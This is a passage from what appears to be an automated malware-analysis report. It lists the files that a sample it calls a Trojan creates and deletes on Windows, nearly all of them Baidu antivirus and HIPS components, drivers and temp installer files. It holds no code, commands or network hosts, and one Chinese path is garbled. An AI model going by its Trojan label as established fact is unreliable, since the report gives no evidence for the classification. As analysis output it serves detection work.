%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKV.rdb (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\FileMon.dll (21216 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll (43 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\iexplore.exe.xml (528 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\SearchProtection.rdb (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tuopan.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\810.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHips.exe (38495 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\ccesign.dat (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\KVInstallHelper.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ad.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ccesign.dat (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bdmp.dat (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebSafe.dll (33747 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度æÂ€毒\å¸载百度æÂ€毒.lnk (880 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\fm.dat (597 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll (47 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\white_list.dat (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMMsg.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMEvents.dll (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdRepair.exe (16288 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand64.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMRepMgr.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMEvents.dll (15 bytes)
%System%\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSd.exe (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BSRLib.dat (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\virus_type.dat (1 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdSvc.exe (27704 bytes)
%System%\config\SYSTEM.LOG (4386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDPerflog.dll (10512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMScriptVM.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMAVCached.dll (23584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\tips.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdRepair.exe (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\cache_config.dat (469 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\KVCommonRes.rdb (131925 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll (7547 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSRCore.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDShellExt.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\placeholder_tmp (11 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\wverify.dat (15019 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\DllInject.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsClient.xml (18 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMBase.dll (32128 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebMonHook.dll (12088 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\PullUpConfig.xml (1524 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDDriverFixer.dll (16368 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\systemfile.dat (6 bytes)
%System%\drivers\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMTinyXml.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\tuopan.png (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSREng.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0001.dll (4992 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\HIPSClient.dll (15536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMWindowsLib.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDConfig.dll (36536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bdcomproxy.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\vcrt.msi (22552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe (15116 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\blacksign.dat (1704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVFixerConfigMgr.dll (8560 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll (4185 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\blacksign.dat (852 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\duilib license.txt (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\811.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\System.dll (784 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll (2321 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\cache_config.dat (938 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdTray.exe (66750 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\806.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\GetSupplyId.dll (3616 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMReport.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\SysFixerLuaScript.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\patch.7z (33536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDDownLoadProtectPlugin.dll (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_product.xml (291 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\user_trusted_list.dat (125 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\scan_mgr_config.dat (5 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVConfig.rdb (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\TrustAndIso.dll (13440 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\NetService.ini (1230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavFrame.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk4.tmp (1287722 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (43 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMAVEng.dll (46488 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdBugRpt.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0003.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\DriverManager.dll (8608 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (47 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\cache_config.dat (469 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\app.ico (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdUpdate.exe (33263 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDCooly.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\BDMSkin.dll (37727 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDCooly.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDConfig.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\CompatibilityChecker.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavCommon.dll (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\user_trusted_list.dat (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVWsc.exe (13368 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\wverify.dat (132336 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\7z.dll (2105 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMWindowsLib.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDUDiskGuard.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMAVE.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavEngine.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\810.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\vcrt.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\TrustAndIso.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMLog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDLogicUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\RepairPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHips.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\SysFixerConfig.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\KVInstallHelper.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMStringUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ccesign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bdmp.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\putips_wording.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\blacksign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebSafe.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVFixerConfigMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\CoolyContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hipsClient.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanH.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVTray_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVRecomm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hips_product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\fm.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanM.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\PullUpConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMMsg.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GameNoDisturb.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bdcomproxy.dll (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMRepMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMDbSqlite.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMWrench.sys (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMEvents.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\smr.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\kav_verify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\baidusdRepair.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ToastLogo.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\cache_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ToastImage.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\virus_type.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebMonBHO.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMNet.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\GetSupplyId.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\811.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDShellExt64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDownloadProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\SysFixerLuaScript.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebSafePlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdSvc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdRepair.exe (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\patch.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\res\InstallWnd.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bdvs.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDDownLoadProtectPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduHipsUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDPerflog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\901.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVMainframe_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMAVCached.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVRmvDevPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GCCallbackBind.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVDownloadProtect_x64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDArKit.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMScriptVM.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\scan_mgr_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BSRLib.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKitUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\UserDetectionPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSRCore.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMRepBase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GCScriptBind.dll (0 bytes)
